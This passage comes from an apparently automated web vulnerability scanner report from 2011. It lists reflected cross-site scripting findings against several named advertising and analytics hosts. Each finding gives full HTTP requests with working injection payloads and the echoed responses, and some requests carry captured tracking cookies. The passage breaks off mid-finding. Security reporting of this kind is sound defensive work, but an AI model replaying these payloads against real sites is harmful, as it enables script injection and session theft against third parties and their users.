The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 972f7"><img%20src%3da%20onerror%3dalert(1)>3ef0155395d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 972f7"><img src=a onerror=alert(1)>3ef0155395d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /banner_728_90_a.php?search={$keyw/972f7"><img%20src%3da%20onerror%3dalert(1)>3ef0155395dord} HTTP/1.1
Host: pub.retailer-amazon.net
Proxy-Connection: keep-alive
Referer: http://www.kroogy.com/search/amazon?search=mp3&type=Amazon&fl=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 15:19:47 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
X-Powered-By: PleskLin
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 628


<html>
<head>
<title> {$keyw972f7"><img src=a onerror=alert(1)>3ef0155395dord} </title>
<meta name="description" content="{$keyw972f7"><img src=a onerror=alert(1)>3ef0155395dord}">
<meta name="keywor
...[SNIP]...

6.219. http://pub.retailer-amazon.net/banner_728_90_a.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pub.retailer-amazon.net
Path:   /banner_728_90_a.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 929ec"><img%20src%3da%20onerror%3dalert(1)>873de3559f2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 929ec"><img src=a onerror=alert(1)>873de3559f2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /banner_728_90_a.php?search={$keyw/929ec"><img%20src%3da%20onerror%3dalert(1)>873de3559f2ord} HTTP/1.1
Host: pub.retailer-amazon.net
Proxy-Connection: keep-alive
Referer: http://www.kroogy.com/search/amazon?search=mp3&type=Amazon&fl=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 15:19:49 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
X-Powered-By: PleskLin
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 628


<html>
<head>
<title> {$keyw929ec"><img src=a onerror=alert(1)>873de3559f2ord} </title>
<meta name="description" content="{$keyw929ec"><img src=a onerror=alert(1)>873de3559f2ord}">
<meta name="keywor
...[SNIP]...
<iframe name="I1" src="banner_728_90_b.php?search={$keyw929ec"><img src=a onerror=alert(1)>873de3559f2ord}" marginwidth="1" marginheight="1" height="90" width="728" scrolling="no" border="0" frameborder="0">
...[SNIP]...

6.220. http://pub.retailer-amazon.net/banner_728_90_a.php [search parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pub.retailer-amazon.net
Path:   /banner_728_90_a.php

Issue detail

The value of the search request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 18580"><img%20src%3da%20onerror%3dalert(1)>1991fb5953f was submitted in the search parameter. This input was echoed as 18580"><img src=a onerror=alert(1)>1991fb5953f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /banner_728_90_a.php?search={$keyword}18580"><img%20src%3da%20onerror%3dalert(1)>1991fb5953f HTTP/1.1
Host: pub.retailer-amazon.net
Proxy-Connection: keep-alive
Referer: http://www.kroogy.com/search/amazon?search=mp3&type=Amazon&fl=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 15:19:30 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
X-Powered-By: PleskLin
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 628


<html>
<head>
<title> {$keyword}18580"><img src=a onerror=alert(1)>1991fb5953f </title>
<meta name="description" content="{$keyword}18580"><img src=a onerror=alert(1)>1991fb5953f">
<meta name="keywor
...[SNIP]...

6.221. http://pub.retailer-amazon.net/banner_728_90_a.php [search parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pub.retailer-amazon.net
Path:   /banner_728_90_a.php

Issue detail

The value of the search request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a6c01"><img%20src%3da%20onerror%3dalert(1)>cf0911ec38a was submitted in the search parameter. This input was echoed as a6c01"><img src=a onerror=alert(1)>cf0911ec38a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /banner_728_90_a.php?search=a6c01"><img%20src%3da%20onerror%3dalert(1)>cf0911ec38a HTTP/1.1
Host: pub.retailer-amazon.net
Proxy-Connection: keep-alive
Referer: http://www.kroogy.com/search/amazon?search=mp3&type=Amazon&fl=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 15:19:34 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
X-Powered-By: PleskLin
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 588


<html>
<head>
<title> a6c01"><img src=a onerror=alert(1)>cf0911ec38a </title>
<meta name="description" content="a6c01"><img src=a onerror=alert(1)>cf0911ec38a">
<meta name="keywords" content="a6c01">
...[SNIP]...
<iframe name="I1" src="banner_728_90_b.php?search=a6c01"><img src=a onerror=alert(1)>cf0911ec38a" marginwidth="1" marginheight="1" height="90" width="728" scrolling="no" border="0" frameborder="0">
...[SNIP]...

6.222. http://pub.retailer-amazon.net/banner_728_90_b.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pub.retailer-amazon.net
Path:   /banner_728_90_b.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b8051"><img%20src%3da%20onerror%3dalert(1)>a2d347a4a82 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b8051"><img src=a onerror=alert(1)>a2d347a4a82 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /banner_728_90_b.php?search={$keyw/b8051"><img%20src%3da%20onerror%3dalert(1)>a2d347a4a82ord} HTTP/1.1
Host: pub.retailer-amazon.net
Proxy-Connection: keep-alive
Referer: http://pub.retailer-amazon.net/banner_728_90_a.php?search={$keyword}
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 15:19:44 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
X-Powered-By: PleskLin
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 846


<html>
<head>
<title> {$keywb8051"><img src=a onerror=alert(1)>a2d347a4a82ord} </title>
<meta name="description" content="{$keywb8051"><img src=a onerror=alert(1)>a2d347a4a82ord}">
<meta name="keyw
...[SNIP]...

6.223. http://pub.retailer-amazon.net/banner_728_90_b.php [search parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pub.retailer-amazon.net
Path:   /banner_728_90_b.php

Issue detail

The value of the search request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 336c8"><img%20src%3da%20onerror%3dalert(1)>14a1bdf9222 was submitted in the search parameter. This input was echoed as 336c8"><img src=a onerror=alert(1)>14a1bdf9222 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /banner_728_90_b.php?search={$keyword}336c8"><img%20src%3da%20onerror%3dalert(1)>14a1bdf9222 HTTP/1.1
Host: pub.retailer-amazon.net
Proxy-Connection: keep-alive
Referer: http://pub.retailer-amazon.net/banner_728_90_a.php?search={$keyword}
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 15:19:31 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
X-Powered-By: PleskLin
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 846


<html>
<head>
<title> {$keyword}336c8"><img src=a onerror=alert(1)>14a1bdf9222 </title>
<meta name="description" content="{$keyword}336c8"><img src=a onerror=alert(1)>14a1bdf9222">
<meta name="keyw
...[SNIP]...

6.224. http://pubads.g.doubleclick.net/gampad/ads [slotname parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pubads.g.doubleclick.net
Path:   /gampad/ads

Issue detail

The value of the slotname request parameter is copied into the HTML document as plain text between tags. The payload 991ca<script>alert(1)</script>6d2bcb92e25 was submitted in the slotname parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /gampad/ads?correlator=1303674311250&output=json_html&callback=GA_googleSetAdContentsBySlotForSync&impl=s&client=ca-pub-8011115638404408&slotname=hellonetwork_header991ca<script>alert(1)</script>6d2bcb92e25&page_slots=hellonetwork_header&cust_params=Domain%3Dhellolocal%26Keyword%3Dcredit_monitoring&cookie_enabled=1&url=http%3A%2F%2Fwww.hellonetwork.com%2Fypsearch.cfm%3Fkw%3Dcredit%2520monitoring%26KID%3D29264&lmt=1303692311&dt=1303674311251&cc=100&biw=1034&bih=907&ifi=1&adk=518321888&u_tz=-300&u_his=1&u_java=true&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&flash=10.2.154&gads=v2&ga_vid=1282500417.1303674311&ga_sid=1303674311&ga_hid=383501533&ga_wpids=UA-350746-16 HTTP/1.1
Host: pubads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.hellonetwork.com/ypsearch.cfm?kw=credit%20monitoring&KID=29264
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; __utmz=251550727.1303423668.1.1.utmcsr=mgid.com|utmccn=(referral)|utmcmd=referral|utmcct=/ban/home_300_top.html; __utma=251550727.399576100.1303423668.1303423668.1303423668.1; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/javascript; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 20:06:33 GMT
Server: gfp-be
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 2735

GA_googleSetAdContentsBySlotForSync({"hellonetwork_header991ca<script>alert(1)</script>6d2bcb92e25":{"_type_":"html","_expandable_":false,"_html_":"\x3c!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01//EN\"\"http://www.w3.org/TR/html4/strict.dtd\"\x3e\x3chtml\x3e\x3chead\x3e\x3cstyle\x3ea:link{color:#0
...[SNIP]...

6.225. http://r.turn.com/server/beacon_call.js [b2 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://r.turn.com
Path:   /server/beacon_call.js

Issue detail

The value of the b2 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c168d"%3balert(1)//16ca579e8 was submitted in the b2 parameter. This input was echoed as c168d";alert(1)//16ca579e8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server/beacon_call.js?b2=0AAv1BczVsIs47_sR9B2XxU7SNa7YhEu7BrM4zhQ2qapPjlPHlwj6ihHBkcIZjiFiTKylLKplNj7_8c8tsd88wc168d"%3balert(1)//16ca579e8 HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
Referer: http://www.myfico.com/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adImpCount=RNJ9hNp_Ytke4K3_MLDetaBZCzjPRhryFEOqult4msa76nVUEQrqCfHGx7lLD55exEdzmswgsukEeGYUFx4XIGn96wzml5HD9lJW6BrLMriX4Qp5J-iSAILnbVuT-E5IREBfIGiYWGHD9doGCH1wTar1Ljo6rmrwvUfLD268riQ_eup_DpbPuBi-l0uJC1Cg4iLKE3m6yPkT4AvF4oP9oThAVWEvsmYmt6NIdXLN-7YnPNAqpsobwskjQzsb37_Pf2EzZTks7MGb0-GsBSAyZLfwESJ4HNhmJtjvBex-YKB5MGYB2nENTxzt6uCLwC5ZNpEEy1Y6E_EHxRfmbLZ1cZAp6lfWXEyXpQ0UKYwGF6TGhPyeXqnVY7Z3281c6JDsemNa-3CGw7dg2Xbxl9yyj4GzMLLi_eaSDDqINHp02oDhNKKp2uy6Jf_izbJ4fT1Iu_2URTPQwp7prxJqmG7gw9SyCjmpX6JZPgLa8yTvHuZqGjdQJTtjVZ9bXK_YQ_BTqP4noXltQtlWO_ADLz9yaG1HPNJmxjyYHWoZ-RvqO1R0S-iv_7FnY0Y5Xeddz_jO_ftWvK6YyvSIbYzcA4q2yx3BGIBe1qfIDTYPebZTLrDwtRWptERdq1_CwAIiDWPEKR1gXBTdH5jry0PtoQ1AeLHTgneiPs4w-PNB0rlR8LbQ13hqHz-NHOrXrabdjXmcRCHTQmWZ5Wp2jjyoTn-TRx9yZxewgOeaPJ0dTEeD2PttBPdeqoht9ByqjYbOh33ulo3YD0zbB9W6Jh-fPou70xdysS9NILgDVV-2RjchUloGmpS1vpTy7CEw_F27aSBKrxrCOwXSkhXOnAokDiKNJ7fwESJ4HNhmJtjvBex-YKAXUSxCCUQ26wFsXGXfUWiK7dQaUAsNKGmGOpY_21OII2rMkfzJCRjod-12LuM3yNFSsZtDmqT68cmfxNCdttVxemNa-3CGw7dg2Xbxl9yyjxUjUlBm2w0A6oYt2TFvb88wfqRHkdzRktg9x4ASm7mYj6Inq-va6FwQyLupvU3--XP7Da31DnYEVo5TPgRz20HK8hNK5y4spsdBx22_Atqh4yf7gWdRyY4nO--zz6sln7A3_z4NlZPxFoPt3Uw_aRVSN0m2klEeTW1KA1di8OAYXXVxlTgh_voK6emDWdftgO-nut4CNoTli9hKdQgGGL_ArFbsMU7SM_RHjy_6zjGAVdA-aRZXmNDP7lSI2wQSG_ZkBdgJgIHJ_0GD9hEAnNu6lhUpb2IzujoXnFpxd00nfu4977TrZ8GHyhed93dEHYQYHOHaF4abG8I094dduCWyYLZMG4wQKFopdYuz1yBkrjocbhf_en5ky2Zgm3rpe_TLLYkm6ow_hSldLzYIRQzPkiGLTlQAB-AyRlZy8hNM5CZdwH63dX586rlVt-rm7T5lk3rNTcwPq3Nv0aBcfX_WCWnBzCQuIbOVa7F8E-DsQQ0XtSgyP9-pRtjKBA9Cw6KpKCQRV_nuo9XTdqfcEuFjw1q3jr96MmE73EdnErm3vwl2KfkvqpOe3sJLkGJnPxWaM37S_qVbKjiLc0d7HG2j37arSozuBgqeZjp8etrKP0MMPHRCJQircGmeFefpToKqMVJJLJFDSB1wQojnNFLZVi-KxNkQ_VJiUnD6sFTZsgkWZhbwRXzuNDStWlCtyOUwHwhiIhI6vYlDAmBKnXtBmdLEA3K48MCNCNawEQzJsDf_Pg2Vk_EWg-3dTD9pFR_es5qV3056KPq2rUT5zBRTUUfVyhkIRasPswtxI7iKl7s6FAXEc8n5El2XcbrTucHE0v-tlwP1vZz1VQYwdIxV0D5pFleY0M_uVIjbBBIbBawJhlLv8g8ldsI-35kGCJVwRl8sycZ0PAtWrVTViuFYrui1COy2KOTpvlid1x6YDCy0LXBHUGgi2TaPtaYUWrJgtkwbjBAoWil1i7PXIGSp-mVft7M-LblYrLgbicDRcQIWfivnSOLEVf1fvaJ0LD4GOmXn-MdBpj5v6mUeKpEu_qA1v2JfEexKn5Jue0cnG6zc79hiM8lP3DRxPQPRgI0_xuWp1g1tkjZsLrAdv1550JC_L7GVNyA8GmhInk0modn5i3E9PsY1OXjKV8iYCdqOsFLtLW59aQLrs4R_Sm6HRv-fT0qZpcVwrwAMPoWw2SuEzmZPy7Pr3B2CT3i7f8WgzvsrFMQFtFLJosfmmwkcBIXiYC5KD6oiDkyhrBnCDrTceeWmOo3AglxIXXfIZd248k5q7u-e5MH_3Xle2fFdIDPTok26GX0-9FGi9EqsKDQR55l7woSi_1v5QjXhRriTW_fRiD-EyoZMz5Idfibr8WjiDSnM4ZZATJKUQIeAiWWBUQxuKfY0m-KUHuSwyrtLP__ldjsbRYS1T0uHXJk24PSL8z3mFkMRObsNqHzbQA0GI3YPOGb-lYcNs_O6CBvbTlsrpNMd1ulI4WK-iRF7ehMgm_ROAJYmpIw1CyVHCx4Lh6UpiYYG1o8vcl5mQP9VGVJnredzylZiYSDC8VOJU0K6xTdplSIqaWyjrlo4KhxO6BPAp6mtQbed5gA0Cjgnp6Rw5lmAsU07N51K5j3PZSzxrE9kN_uZFovGfORhH6MoH1n1mLx2USSZv2x8_HGESPaIScxefiiPNK0OCUG5MdnRQlgwUbxU_0BtXy0yd8WW2V42t-IFhBe9yaSFw1_tpW4L2632z_PWw-s3g_lGgo6LZg0d3xlBa7ocQft3sG2mMmWuyyqIdPSqtxjRklIlnrGECTG2lMEZCOsAdkiEkwcNQoFjB6uEJlwUgsEKF4_WO7NWBkt0qQueOBvF3XTM0Qj0i6d6Ne-SMo9ZRW34nL2E8dfUI4qK_3hTt65_O1ilUO_qIHp6Muzc_la1U_2OjiAOU7PEbuWm84pe5TEp0-dwH4uGF_DEF6HvhgoubqHZESmqy0_uUoo7aAuONZ3XbPI2lPBO0ew9_baQ3iGFyTbNllGW2-6SPL-Yz_5v0XPkSOvI7kYSdc19CnoSeevm6OsBW-cQfSWP67IsCnN3J3RK7HJ47DOwUgikkAA72ly1dOLu1ZkDcoAF8YeGRX_lq7jZ32JrugGCjUIuqMkyLoTQYaIc9uW48ZcNu2ciILtP-yK1JywsvYFiqMlV9gHJ2EXSlkdHYPQHM9nqB2E7HqGtyuc3OfzTlki21Iked0l5Ymb2bmtH2iyNubJGsSKw_zqF-QjnG4_NexZYaYWdSdJxVooCOghLFZBKn_0EQO2vAre22F8lnSmyeDcza7YGogWldkaT1u5x3E36xXrNS7o-uQk9nl956dFM0clLfmZEZSVy6Y-xcSL0nyDvBegaxMxUkPFg2MrXe2Tu6RZYK_eJ83sbVbZgk4Mm2xjvgW7-OS05wcvyGHBsJw9q1CYZ-KKGVDzHPl9zlz7CulV5IVqtOgzxHZaVHOIdEQIOjCbv6Ls4W-7l6hZieh5H5pfJvz0_xp0u9Sr3Ow-0lehezJJr2l8tby08-BywuvZFxyM4somZiu5xkNZQ15_U6Rpo-UcV-kqgda3I_RK6XB_G-nPmaE7wHqMJQ3-EmxOFvfzd5YD06fPVNZ1LTBZN4ocL1Rk_SlsYqw7IlYjuWqlv4egixt5B17GL1Jx5afmr; fc=S44WeTE_hcsignE6AFtjxTFBxEpH-UBt3Uc78oaz-ks4OhgZIpdKD2vECvnz_VEM2CjyBHHN4B50paqel1-StJLdzlSJYnWgjgpSWPKJZqanh77CDv_Cb5k2sLKUWKhY0sNf3mqCcrIxbMgK0qZIglL8KhgM5_wQzjFfm742WtkVxzGoC7kGLIbIhejl5eSL117dg5whaFGMwxNuo3bM3cdBF4hyWWGJ3xpNV_dvAQw_F9c8z5-xQ96PvJcb-tlK; rrs=1%7C2%7C3%7C4%7Cundefined%7C6%7C7%7Cundefined%7C9%7C1001%7C1002%7C1003%7C10%7C1004%7Cundefined%7C12; rds=15082%7C15082%7C15082%7C15088%7Cundefined%7C15082%7C15082%7Cundefined%7C15082%7C15082%7C15085%7C15085%7C15082%7C15085%7Cundefined%7C15085; rv=1; uid=2931142961646634775; pf=QthMWhxAxunQ280Xf9ii_wtAEDM9K1B72KULkXUlX8NRcLk8NruKfOHq5s0oc9_4_z8HPYaM65wmqlJy40vBaYvArNzG1QqMSLzk0Y7eRlHbBBZLfT_BK8xpQoJeaflFDbi6buCcg1BJsW_RTdv7uoR_9BWcT-zGE02dbimReCSDW0griAVvQE94cyJ-DkYPJlZ1WShlj4d39vr4PohmL6ZdD_e67rrVF_sWDlVllelxOcnYiSNQxNssakUoC2riraWqfHBDw_H9xSNaAtNnbQf1IgLeKhwgmzMYf85N7Pm30TLuI4XWJiHBjEbIQgLPyz8GxeJmtPzHZrzLKg43uPeieXQWZ65suuR9ISteoXByCfjLazvDPeoHMENdvcf_HVtzr9TwkFmb19XMcE-PI0YTAc4moWLqXt-LxUkAFthhmfjrjHjgO4OA5Vg95kgM1YIHVyuMs-w3Ungw7XF7DiQ7NhOIY3Y5JGn-D_kdD1t2wEqTNoKJQq-trGSbanyFMg-uIbhYWEzV5Cy7Bt71qKW48ZtSzbvnjm9UWGWwbzEklau_Hm2PwNVLmS3Kn2Ze8WB7caQyxbvcXz-Vu9fbl9QHlKNdXlp3X0qNjWl-ZNY92SVgy1Rr_zM9DQIV69hU1V7H8hzcZsXHJ_7-KPzDcHVHEPoiA_oorQKuggmxJ8aK1TYHqd7sqI1CTBxYjup3SKIj0Ppe1A-NYvh1sIuWhqHXhLh9thw9Z8wo2y3Rb598NipMClMqVuhmOgo9_OVFhK6X2BNy0N_J8GUVf1ZWMmW4g3TKG2nnW1tZjvvWAe90N7kHN-HIMgpg1jTBqpNqF0gWgSuLt99ltnbBHBn72E8Vx3DSUKEDbd5G1D0iesJm8NyROg6yjoIzzr7W1v2huevsxBJIu88gA95UXzbbWwze4Dc1hJxT0qQAT0ZLxqcURu-XVDYUIG3wtGG-V0zQDN7gNzWEnFPSpABPRkvGpw6nvm6lYGn_0vv-MD0-G_MEQB7ySHfiSIwRw_m0KQQ48IcOuLnGhySudQOYGIQx5mch6oN8L79MLzYpLfu5NsjvBjoQ5161VHfVsNI3VGXPTfaAOOoKS2q0SC773O-2x_vzhU_6kseK7k1TFGzm6QBECUHtD0-dE8ZS9u-n0JV9eQ_xlBO540IIdF3lJoJncaqBYRQD5EKY_vj9LRKkjlu2CwwIZK1cl1YeBa7Utg2N0j3lEaO_pnPx7iWb3Qc481uO_cEBhdcDoCpO4Ryz6sJFw1yvlyBGzlsYtK-Nwt7yUymrAiJtfcMoLfio0g5djEODDcVsRxgKp8kYkrCDHktnaGVDQ0INGjeIcA_yFJJ0-du_DtXfoeu8ylBEW8q16Q

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: public
Cache-Control: max-age=172800
Cache-Control: must-revalidate
Expires: Wed, 27 Apr 2011 01:08:13 GMT
Content-Type: text/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 25 Apr 2011 01:08:13 GMT
Content-Length: 1570

(function() {
   function reset(w, doc) {
       var n=null;
       w.turn_beacon_data=n;
       w.turn_beacon_price=n;
       w.turn_beacon_url=n;
       w.turn_client_track_id=n;
       w.turn_beacon_referrer_url=n;
       w.turn_beaco
...[SNIP]...
nction setBeaconUrl(w, doc) {
                   w.turn_beacon_url = "http://r.turn.com/r/beacon?";
                           w.turn_beacon_data = "0AAv1BczVsIs47_sR9B2XxU7SNa7YhEu7BrM4zhQ2qapPjlPHlwj6ihHBkcIZjiFiTKylLKplNj7_8c8tsd88wc168d";alert(1)//16ca579e8";
           addBeaconUrlParam(w, "b2", w.turn_beacon_data);
               addBeaconUrlParam(w, "jsb", "1");
                   addBeaconUrlParam(w, "bprice", w.turn_beacon_price);
                           addBeaconUrlParam(w, "cid", w.turn_client_tr
...[SNIP]...

6.226. http://s18.sitemeter.com/js/counter.asp [site parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s18.sitemeter.com
Path:   /js/counter.asp

Issue detail

The value of the site request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cd519'%3balert(1)//ab8025f0f90 was submitted in the site parameter. This input was echoed as cd519';alert(1)//ab8025f0f90 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js/counter.asp?site=s18neumediacd519'%3balert(1)//ab8025f0f90 HTTP/1.1
Host: s18.sitemeter.com
Proxy-Connection: keep-alive
Referer: http://www.neudesicmediagroup.com/Advertising.aspx?site=Silverlight
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 24 Apr 2011 15:57:47 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3pEXTRA.xml", CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Content-Length: 7320
Content-Type: application/x-javascript
Expires: Sun, 24 Apr 2011 16:07:47 GMT
Set-Cookie: IP=173%2E193%2E214%2E243; path=/js
Cache-control: private

// Copyright (c)2006 Site Meter, Inc.
// <![CDATA[
var SiteMeter =
{
   init:function( sCodeName, sServerName, sSecurityCode )
   {
       SiteMeter.CodeName = sCodeName;
       SiteMeter.ServerName = sServe
...[SNIP]...
.addEventListener(sEvent, func, false);
       else
           if (obj.attachEvent)
            obj.attachEvent( "on"+sEvent, func );
           else
               return false;
       return true;
   }

}

SiteMeter.init('s18neumediacd519';alert(1)//ab8025f0f90', 's18.sitemeter.com', '');

var g_sLastCodeName = 's18neumediacd519';alert(1)//ab8025f0f90';
// ]]>
...[SNIP]...

6.227. http://s18.sitemeter.com/js/counter.js [site parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s18.sitemeter.com
Path:   /js/counter.js

Issue detail

The value of the site request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 45a9b'%3balert(1)//de697cd2bf8 was submitted in the site parameter. This input was echoed as 45a9b';alert(1)//de697cd2bf8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

